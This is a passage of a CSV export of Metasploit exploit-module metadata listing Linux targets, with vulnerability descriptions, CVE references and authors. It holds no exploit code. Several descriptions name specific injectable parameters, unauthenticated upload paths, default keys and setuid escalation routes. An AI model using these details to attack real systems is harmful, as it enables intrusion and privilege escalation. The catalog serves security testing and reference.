40,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb","exploit","linux/http/symantec_web_gateway_file_upload","exploit/linux/http/symantec_web_gateway_file_upload","Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability",600,"This module exploits a file upload vulnerability found in Symantec Web Gateway's HTTP service. Due to the incorrect use of file extensions in the upload_file() function, attackers may abuse the spywall/blocked_file.php file in order to upload a malicious PHP file without any authentication, which results in arbitrary code execution.","Metasploit Framework License (BSD)","f","2012-05-17 00:00:00",0,,"aggressive","t","BID-53443, CVE-2012-0299, OSVDB-82025, URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-091","Tenable Network Security, juan vazquez "
41,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/symantec_web_gateway_lfi.rb","exploit","linux/http/symantec_web_gateway_lfi","exploit/linux/http/symantec_web_gateway_lfi","Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability",600,"This module exploits a vulnerability found in Symantec Web Gateway's HTTP service. By injecting PHP code in the access log, it is possible to load it with a directory traversal flaw, which allows remote code execution under the context of 'apache'. Please note that it may take up to several minutes to retrieve access_log, which is about the amount of time required to see a shell back.","Metasploit Framework License (BSD)","f","2012-05-17 00:00:00",0,,"aggressive","t","CVE-2012-0297, EDB-18932, OSVDB-82023, URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00","Unknown, muts, sinn3r "
42,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb","exploit","linux/http/symantec_web_gateway_pbcontrol","exploit/linux/http/symantec_web_gateway_pbcontrol","Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection",600,"This module exploits a command injection vulnerability found in Symantec Web Gateway's HTTP service.
While handling the filename parameter, the Spywall API does not do any filtering before passing it to an exec() call in proxy_file(), thus results in remote code execution under the context of the web server. Please note authentication is NOT needed to gain access.","Metasploit Framework License (BSD)","f","2012-07-23 00:00:00",0,,"aggressive","t","BID-54426, CVE-2012-2953, EDB-20088, OSVDB-84120, URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00","muts, sinn3r " 43,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/vcms_upload.rb","exploit","linux/http/vcms_upload","exploit/linux/http/vcms_upload","V-CMS PHP File Upload and Execute",600,"This module exploits a vulnerability found on V-CMS's inline image upload feature. The problem is due to the inline_image_upload.php file not checking the file type before saving it on the web server. This allows any malicious user to upload a script (such as PHP) without authentication, and then execute it with a GET request. The issue is fixed in 1.1 by checking the extension name. By default, 1.1 only allows jpg, jpeg, png, gif, bmp, but it is still possible to upload a PHP file as one of those extension names, which may still be leveraged in an attack.","Metasploit Framework License (BSD)","f","2011-11-27 00:00:00",0,,"aggressive","t","BID-50706, CVE-2011-4828, URL-http://bugs.v-cms.org/view.php?id=53, URL-http://xforce.iss.net/xforce/xfdb/71358","AutoSec Tools, sinn3r " 44,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/wanem_exec.rb","exploit","linux/http/wanem_exec","exploit/linux/http/wanem_exec","WAN Emulator v2.3 Command Execution",600,"This module exploits a command execution vulnerability in WAN Emulator version 2.3 which can be abused to allow unauthenticated users to execute arbitrary commands under the context of the 'www-data' user. 
The 'result.php' script calls shell_exec() with user controlled data from the 'pc' parameter. This module also exploits a command execution vulnerability to gain root privileges. The 'dosu' binary is suid 'root' and vulnerable to command execution in argument one.","Metasploit Framework License (BSD)","t","2012-08-12 00:00:00",0,,"aggressive","t","OSVDB-85344, OSVDB-85345, URL-http://itsecuritysolutions.org/2012-08-12-wanem-v2.3-multiple-vulnerabilities/","Brendan Coles " 45,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/webcalendar_settings_exec.rb","exploit","linux/http/webcalendar_settings_exec","exploit/linux/http/webcalendar_settings_exec","WebCalendar 1.2.4 Pre-Auth Remote Code Injection",600,"This modules exploits a vulnerability found in k5n.us WebCalendar, version 1.2.4 or less. If not removed, the settings.php script meant for installation can be update by an attacker, and then inject code in it. This allows arbitrary code execution as www-data.","Metasploit Framework License (BSD)","f","2012-04-23 00:00:00",0,,"aggressive","t","CVE-2012-1495, EDB-18775, OSVDB-81329","EgiX, sinn3r " 46,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/webid_converter.rb","exploit","linux/http/webid_converter","exploit/linux/http/webid_converter","WeBid converter.php Remote PHP Code Injection",600,"This module exploits a vulnerability found in WeBid version 1.0.2. 
By abusing the converter.php file, a malicious user can inject PHP code in the includes/currencies.php script without any authentication, which results in arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-07-05 00:00:00",0,,"aggressive","t","EDB-17487, OSVDB-73609, URL-http://www.webidsupport.com/forums/showthread.php?3892","EgiX, juan vazquez " 47,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/zen_load_balancer_exec.rb","exploit","linux/http/zen_load_balancer_exec","exploit/linux/http/zen_load_balancer_exec","ZEN Load Balancer Filelog Command Execution",600,"This module exploits a vulnerability in ZEN Load Balancer version 2.0 and 3.0-rc1 which could be abused to allow authenticated users to execute arbitrary code under the context of the 'root' user. The 'content2-2.cgi' file uses user controlled data from the 'filelog' parameter within backticks.","Metasploit Framework License (BSD)","t","2012-09-14 00:00:00",0,,"aggressive","t","OSVDB-85654, URL-http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/","Brendan Coles " 48,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb","exploit","linux/http/zenoss_showdaemonxmlconfig_exec","exploit/linux/http/zenoss_showdaemonxmlconfig_exec","Zenoss 3 showDaemonXMLConfig Command Execution",400,"This module exploits a command execution vulnerability in Zenoss 3.x which could be abused to allow authenticated users to execute arbitrary code under the context of the 'zenoss' user. 
The show_daemon_xml_configs() function in the 'ZenossInfo.py' script calls Popen() with user controlled data from the 'daemon' parameter.","Metasploit Framework License (BSD)","f","2012-07-30 00:00:00",0,,"aggressive","t","OSVDB-84408, URL-http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/","Brendan Coles " 49,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/ids/snortbopre.rb","exploit","linux/ids/snortbopre","exploit/linux/ids/snortbopre","Snort Back Orifice Pre-Preprocessor Buffer Overflow",400,"This module exploits a stack buffer overflow in the Back Orifice pre-processor module included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could be used to completely compromise a Snort sensor, and would typically gain an attacker full root or administrative privileges.","BSD License","f","2005-10-18 00:00:00",0,,"aggressive","t","BID-15131, CVE-2005-3252, OSVDB-20034, URL-http://xforce.iss.net/xforce/alerts/id/207","KaiJern Lau " 50,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/imap/imap_uw_lsub.rb","exploit","linux/imap/imap_uw_lsub","exploit/linux/imap/imap_uw_lsub","UoW IMAP server LSUB Buffer Overflow",400,"This module exploits a buffer overflow in the 'LSUB' command of the University of Washington IMAP service. 
This vulnerability can only be exploited with a valid username and password.","Metasploit Framework License (BSD)","f","2000-04-16 00:00:00",0,,"aggressive","t","BID-1110, CVE-2000-0284, EDB-284, OSVDB-12037","jduck , patrick " 51,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/local/hp_smhstart.rb","exploit","linux/local/hp_smhstart","exploit/linux/local/hp_smhstart","HP System Management Homepage Local Privilege Escalation",300,"Versions of HP System Management Homepage <= 7.1.2 include a setuid root smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR env variable.","Metasploit Framework License (BSD)","f","2013-03-30 00:00:00",0,,"aggressive","t","OSVDB-91990","agix" 52,"2013-05-14 23:14:14","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/local/kloxo_lxsuexec.rb","exploit","linux/local/kloxo_lxsuexec","exploit/linux/local/kloxo_lxsuexec","Kloxo Local Privilege Escalation",300,"Version 6.1.12 and earlier of Kloxo contain two setuid root binaries such as lxsuexec and lxrestart, allow local privilege escalation to root from uid 48, Apache by default on CentOS 5.8, the operating system supported by Kloxo. This module has been tested successfully with Kloxo 6.1.12 and 6.1.6.","Metasploit Framework License (BSD)","t","2012-09-18 00:00:00",0,,"aggressive","t","EDB-25406, URL-http://roothackers.net/showthread.php?tid=92","HTP, juan vazquez " 53,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/local/sock_sendpage.rb","exploit","linux/local/sock_sendpage","exploit/linux/local/sock_sendpage","Linux Kernel Sendpage Local Privilege Escalation",500,"The Linux kernel failed to properly initialize some entries the proto_ops struct for several protocols, leading to NULL being derefenced and used as a function pointer. By using mmap(2) to map page 0, an attacker can execute arbitrary code in the context of the kernel. 
Several public exploits exist for this vulnerability, including spender's wunderbar_emporium and rcvalle's ppc port, sock_sendpage.c. All Linux 2.4/2.6 versions since May 2001 are believed to be affected: 2.4.4 up to and including 2.4.37.4; 2.6.0 up to and including 2.6.30.4","Metasploit Framework License (BSD)","f","2009-08-13 00:00:00",0,,"aggressive","t","CVE-2009-2692, URL-http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html, URL-http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz","Julien Tinnes , Tavis Ormandy, egypt , rcvalle, spender" 54,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/local/udev_netlink.rb","exploit","linux/local/udev_netlink","exploit/linux/local/udev_netlink","Linux udev Netlink Local Privilege Escalation",500,"Versions of udev < 1.4.1 do not verify that netlink messages are coming from the kernel. This allows local users to gain privileges by sending netlink messages from userland.","Metasploit Framework License (BSD)","f","2009-04-16 00:00:00",0,,"aggressive","t","BID-34536, CVE-2009-1185, OSVDB-53810","Jon Oberheide, egypt , kcope" 55,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb","exploit","linux/madwifi/madwifi_giwscan_cb","exploit/linux/madwifi/madwifi_giwscan_cb","Madwifi SIOCGIWSCAN Buffer Overflow",200,"The Madwifi driver under Linux is vulnerable to a remote kernel-mode stack-based buffer overflow. The vulnerability is triggered by one of these properly crafted information element: WPA, RSN, WME and Atheros OUI Current madwifi driver (0.9.2) and and all madwifi-ng drivers since r1504 are vulnerable Madwifi 0.9.2.1 release corrects the issue. This module has been tested against Ubuntu 6.10 and is 100% reliable, doesn\'t crash the Wifi stack and can exploit the same machine multiple time without the need to reboot it. 
This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.","Metasploit Framework License (BSD)","f","2006-12-08 00:00:00",,,"aggressive","t","CVE-2006-6332, OSVDB-31267, URL-http://www.madwifi.org","Julien Tinnes , Laurent Butti <0x9090 at gmail.com>" 56,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/accellion_fta_mpipe2.rb","exploit","linux/misc/accellion_fta_mpipe2","exploit/linux/misc/accellion_fta_mpipe2","Accellion File Transfer Appliance MPIPE2 Command Execution",600,"This module exploits a chain of vulnerabilities in the Accellion File Transfer appliance. This appliance exposes a UDP service on port 8812 that acts as a gateway to the internal communication bus. This service uses Blowfish encryption for authentication, but the appliance ships with two easy to guess default authentication keys. This module abuses the known default encryption keys to inject a message into the communication bus. In order to execute arbitrary commands on the remote appliance, a message is injected into the bus destined for the 'matchrep' service. This service exposes a function named 'insert_plugin_meta_info' which is vulnerable to an input validation flaw in a call to system(). This provides access to the 'soggycat' user account, which has sudo privileges to run the primary admin tool as root. 
These two flaws are fixed in update version FTA_8_0_562.","Metasploit Framework License (BSD)","t","2011-02-07 00:00:00",0,,"aggressive","t","OSVDB-71362, OSVDB-71363, URL-http://www.rapid7.com/security-center/advisories/R7-0039.jsp","hdm " 57,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/drb_remote_codeexec.rb","exploit","linux/misc/drb_remote_codeexec","exploit/linux/misc/drb_remote_codeexec","Distributed Ruby Send instance_eval/syscall Code Execution",600,"This module exploits remote code execution vulnerabilities in dRuby","Metasploit Framework License (BSD)","f","2011-03-23 00:00:00",0,,"aggressive","t","URL-http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html","joernchen " 58,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/gld_postfix.rb","exploit","linux/misc/gld_postfix","exploit/linux/misc/gld_postfix","GLD (Greylisting Daemon) Postfix Buffer Overflow",400,"This module exploits a stack buffer overflow in the Salim Gasmi GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten.","Metasploit Framework License (BSD)","t","2005-04-12 00:00:00",0,,"aggressive","t","BID-13129, CVE-2005-1099, EDB-934, OSVDB-15492","patrick " 59,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb","exploit","linux/misc/hp_data_protector_cmd_exec","exploit/linux/misc/hp_data_protector_cmd_exec","HP Data Protector 6 EXEC_CMD Remote Code Execution",600,"This exploit abuses a vulnerability in the HP Data Protector service. 
This flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD command and traverse back to /bin/sh, this allows arbitrary remote code execution under the context of root.","Metasploit Framework License (BSD)","f","2011-02-07 00:00:00",0,,"aggressive","t","CVE-2011-0923, OSVDB-72526, URL-http://c4an-dl.blogspot.com/hp-data-protector-vuln.html, URL-http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-055/, URL-https://community.rapid7.com/thread/2253","Javier Ignacio, c4an, ch0ks, wireghoul" 60,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/hplip_hpssd_exec.rb","exploit","linux/misc/hplip_hpssd_exec","exploit/linux/misc/hplip_hpssd_exec","HPLIP hpssd.py From Address Arbitrary Command Execution",600,"This module exploits a command execution vulnerable in the hpssd.py daemon of the Hewlett-Packard Linux Imaging and Printing Project. According to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable. This module was written and tested using the Fedora 6 Linux distribution. On the test system, the daemon listens on localhost only and runs with root privileges. Although the configuration shows the daemon is to listen on port 2207, it actually listens on a dynamic port. 
NOTE: If the target system does not have a 'sendmail' command installed, this vulnerability cannot be exploited.","Metasploit Framework License (BSD)","t","2007-10-04 00:00:00",0,,"aggressive","t","BID-26054, CVE-2007-5208, OSVDB-41693, URL-https://bugzilla.redhat.com/attachment.cgi?id=217201&action=edit, URL-https://bugzilla.redhat.com/show_bug.cgi?id=319921","jduck " 61,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/ib_inet_connect.rb","exploit","linux/misc/ib_inet_connect","exploit/linux/misc/ib_inet_connect","Borland InterBase INET_connect() Buffer Overflow",400,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",0,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38605, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 62,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/ib_jrd8_create_database.rb","exploit","linux/misc/ib_jrd8_create_database","exploit/linux/misc/ib_jrd8_create_database","Borland InterBase jrd8_create_database() Buffer Overflow",400,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",0,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38606, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 63,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/ib_open_marker_file.rb","exploit","linux/misc/ib_open_marker_file","exploit/linux/misc/ib_open_marker_file","Borland InterBase open_marker_file() Buffer Overflow",400,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request.","Metasploit Framework License (BSD)","t","2007-10-03 
00:00:00",0,,"aggressive","t","BID-25917, CVE-2007-5244, OSVDB-38610, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 64,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/ib_pwd_db_aliased.rb","exploit","linux/misc/ib_pwd_db_aliased","exploit/linux/misc/ib_pwd_db_aliased","Borland InterBase PWD_db_aliased() Buffer Overflow",400,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",0,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38607, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 65,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/lprng_format_string.rb","exploit","linux/misc/lprng_format_string","exploit/linux/misc/lprng_format_string","LPRng use_syslog Remote Format String Vulnerability",300,"This module exploits a format string vulnerability in the LPRng print server. This vulnerability was discovered by Chris Evans. There was a publicly circulating worm targeting this vulnerability, which prompted RedHat to pull their 7.0 release. They consequently re-released it as ""7.0-respin"".","Metasploit Framework License (BSD)","t","2000-09-25 00:00:00",,,"aggressive","t","BID-1712, CVE-2000-0917, EDB-226, EDB-227, EDB-230, OSVDB-421, URL-http://www.cert.org/advisories/CA-2000-22.html, URL-https://bugzilla.redhat.com/show_bug.cgi?id=17756, US-CERT-VU-382365","jduck " 66,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/mongod_native_helper.rb","exploit","linux/misc/mongod_native_helper","exploit/linux/misc/mongod_native_helper","MongoDB nativeHelper.apply Remote Code Execution",300,"This module exploit a the nativeHelper feature from spiderMonkey which allows to to control execution by calling it wit specially crafted arguments. 
This module has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.","Metasploit Framework License (BSD)","f","2013-03-24 00:00:00",0,,"aggressive","t","BID-58695, CVE-2013-1892, OSVDB-91632, URL-http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/","agix" 67,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/nagios_nrpe_arguments.rb","exploit","linux/misc/nagios_nrpe_arguments","exploit/linux/misc/nagios_nrpe_arguments","Nagios Remote Plugin Executor Arbitrary Command Execution",600,"The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.","Metasploit Framework License (BSD)","f","2013-02-21 00:00:00",0,,"aggressive","t","BID-58142, CVE-2013-1362, OSVDB-90582, URL-http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability","Rudolph Pereir, jwpari " 68,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/netsupport_manager_agent.rb","exploit","linux/misc/netsupport_manager_agent","exploit/linux/misc/netsupport_manager_agent","NetSupport Manager Agent Remote Buffer Overflow",200,"This module exploits a buffer overflow in NetSupport Manager Agent. 
It uses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.","Metasploit Framework License (BSD)","t","2011-01-08 00:00:00",0,,"aggressive","t","BID-45728, CVE-2011-0404, EDB-15937, OSVDB-70408, URL-http://seclists.org/fulldisclosure/2011/Jan/90","Evan, Luca Carettoni ( , jduck " 69,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb","exploit","linux/misc/novell_edirectory_ncp_bof","exploit/linux/misc/novell_edirectory_ncp_bof","Novell eDirectory 8 Buffer Overflow",300,"This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The vulnerability exists in the ndsd daemon, specifically in the NCP service, while parsing a specially crafted Keyed Object Login request. It allows remote code execution with root privileges.","Metasploit Framework License (BSD)","t","2012-12-12 00:00:00",0,,"aggressive","t","BID-57038, CVE-2012-0432, EDB-24205, OSVDB-88718, URL-http://seclists.org/fulldisclosure/2013/Jan/97, URL-http://www.novell.com/support/kb/doc.php?id=3426981","David Klein, Gary Nilson, juan vazquez " 70,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/misc/zabbix_server_exec.rb","exploit","linux/misc/zabbix_server_exec","exploit/linux/misc/zabbix_server_exec","Zabbix Server Arbitrary Command Execution",600,"This module abuses the ""Command"" trap in Zabbix Server to execute arbitrary commands without authentication. By default the Node ID ""0"" is used, if it doesn't work, the Node ID is leaked from the error message and exploitation retried. According to the vendor versions prior to 1.6.9 are vulnerable. 
The vulnerability has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.","Metasploit Framework License (BSD)","f","2009-09-10 00:00:00",0,,"aggressive","t","BID-37989, CVE-2009-4498, EDB-10432, OSVDB-60965, URL-https://support.zabbix.com/browse/ZBX-1030","Nicob , juan vazquez " 71,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/mysql/mysql_yassl_getname.rb","exploit","linux/mysql/mysql_yassl_getname","exploit/linux/mysql/mysql_yassl_getname","MySQL yaSSL CertDecoder::GetName Buffer Overflow",400,"This module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier) implementation bundled with MySQL. By sending a specially crafted client certificate, an attacker can execute arbitrary code. This vulnerability is present within the CertDecoder::GetName function inside ""taocrypt/src/asn.cpp"". However, the stack buffer that is written to exists within a parent function's stack frame. NOTE: This vulnerability requires a non-default configuration. First, the attacker must be able to pass the host-based authentication. Next, the server must be configured to listen on an accessible network interface. Lastly, the server must have been manually configured to use SSL. The binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing on Windows XP SP3, these protections successfully prevented exploitation. Testing was also done with mysql on Ubuntu 9.04. Although the vulnerable code is present, both version 5.5.0-m2 built from source and version 5.0.75 from a binary package were not exploitable due to the use of the compiler's FORTIFY feature. 
Although suse11 was mentioned in the original blog post, the binary package they provide does not contain yaSSL or support SSL.","Metasploit Framework License (BSD)","t","2010-01-25 00:00:00",0,,"aggressive","t","BID-37640, BID-37943, BID-37974, CVE-2009-4484, OSVDB-61956, URL-http://intevydis.blogspot.com/2010/01/mysq-yassl-stack-overflow.html, URL-http://secunia.com/advisories/38344/","jduck " 72,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/mysql/mysql_yassl_hello.rb","exploit","linux/mysql/mysql_yassl_hello","exploit/linux/mysql/mysql_yassl_hello","MySQL yaSSL SSL Hello Message Buffer Overflow",400,"This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier) implementation bundled with MySQL <= 6.0. By sending a specially crafted Hello packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-01-04 00:00:00",0,,"aggressive","t","BID-27140, CVE-2008-0226, OSVDB-41195","MC " 73,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb","exploit","linux/pop3/cyrus_pop3d_popsubfolders","exploit/linux/pop3/cyrus_pop3d_popsubfolders","Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow",300,"This exploit takes advantage of a stack based overflow. Once the stack corruption has occured it is possible to overwrite a pointer which is later used for a memcpy. This gives us a write anything anywhere condition similar to a format string vulnerability. NOTE: The popsubfolders option is a non-default setting. I chose to overwrite the GOT with my shellcode and return to it. This defeats the VA random patch and possibly other stack protection features. Tested on gentoo-sources Linux 2.6.16. 
Although Fedora CORE 5 ships with a version containing the vulnerable code, it is not exploitable due to the use of the FORTIFY_SOURCE compiler enhancement","Metasploit Framework License (BSD)","t","2006-05-21 00:00:00",0,,"aggressive","t","BID-18056, CVE-2006-2502, EDB-2053, EDB-2185, OSVDB-25853, URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html","bannedit , jduck " 74,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/postgres/postgres_payload.rb","exploit","linux/postgres/postgres_payload","exploit/linux/postgres/postgres_payload","PostgreSQL for Linux Payload Execution",600,"On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries's from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object's constructor, it does not need to conform to specific Postgres API versions.","Metasploit Framework License (BSD)","f","2007-06-05 00:00:00",0,,"aggressive","t","URL-http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt","egypt , midnitesnake, todb " 75,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/pptp/poptop_negative_read.rb","exploit","linux/pptp/poptop_negative_read","exploit/linux/pptp/poptop_negative_read","Poptop Negative Read Overflow",500,"This is an exploit for the Poptop negative read overflow. This will work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I currently do not have a good way to detect Poptop versions. The server will by default only allow 4 concurrent manager processes (what we run our code in), so you could have a max of 4 shells at once. 
Using the current method of exploitation, our socket will be closed before we have the ability to run code, preventing the use of Findsock.","Metasploit Framework License (BSD)","t","2003-04-09 00:00:00",0,,"aggressive","t","CVE-2003-0213, OSVDB-3293, URL-http://securityfocus.com/archive/1/317995, URL-http://www.freewebs.com/blightninjas/","spoonm " 76,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb","exploit","linux/proxy/squid_ntlm_authenticate","exploit/linux/proxy/squid_ntlm_authenticate","Squid NTLM Authenticate Overflow",500,"This is an exploit for Squid\'s NTLM authenticate overflow (libntlmssp.c). Due to improper bounds checking in ntlm_check_auth, it is possible to overflow the 'pass' variable on the stack with user controlled data of a user defined length. Props to iDEFENSE for the advisory.","Metasploit Framework License (BSD)","f","2004-06-08 00:00:00",0,,"aggressive","t","BID-10500, CVE-2004-0541, OSVDB-6791, URL-http://www.idefense.com/application/poi/display?id=107","skape " 77,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/samba/chain_reply.rb","exploit","linux/samba/chain_reply","exploit/linux/samba/chain_reply","Samba chain_reply Memory Corruption (Linux x86)",400,"This exploits a memory corruption vulnerability present in Samba versions prior to 3.3.13. When handling chained response packets, Samba fails to validate the offset value used when building the next part. By setting this value to a number larger than the destination buffer size, an attacker can corrupt memory. Additionally, setting this value to a value smaller than 'smb_wct' (0x24) will cause the header of the input buffer chunk to be corrupted. After close inspection, it appears that 3.0.x versions of Samba are not exploitable. Since they use an ""InputBuffer"" size of 0x20441, an attacker cannot cause memory to be corrupted in an exploitable way. 
It is possible to corrupt the heap header of the ""InputBuffer"", but it didn't seem possible to get the chunk to be processed again prior to process exit. In order to gain code execution, this exploit attempts to overwrite a ""talloc chunk"" destructor function pointer. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the nx memory protection. NOTE: It is possible to make exploitation attempts indefinitely since Samba forks for user sessions in the default configuration.","Metasploit Framework License (BSD)","t","2010-06-16 00:00:00",0,,"aggressive","t","CVE-2010-2063, OSVDB-65518, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=873","Jun Mao, jduck " 78,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/samba/lsa_transnames_heap.rb","exploit","linux/samba/lsa_transnames_heap","exploit/linux/samba/lsa_transnames_heap","Samba lsa_io_trans_names Heap Overflow",400,"This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. Additionally, this module will not work when the Samba ""log level"" parameter is higher than ""2"".","Metasploit Framework License (BSD)","t","2007-05-14 00:00:00",0,,"aggressive","t","CVE-2007-2446, OSVDB-34699","Adriano Lima , Ramon de C Valle , hdm " 79,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/linux/samba/setinfopolicy_heap.rb","exploit","linux/samba/setinfopolicy_heap","exploit/linux/samba/setinfopolicy_heap","Samba SetInformationPolicy AuditEventsInfo Heap Overflow",300,"This module triggers a vulnerability in the LSA RPC service of the Samba daemon because of an error on the PIDL auto-generated code. 
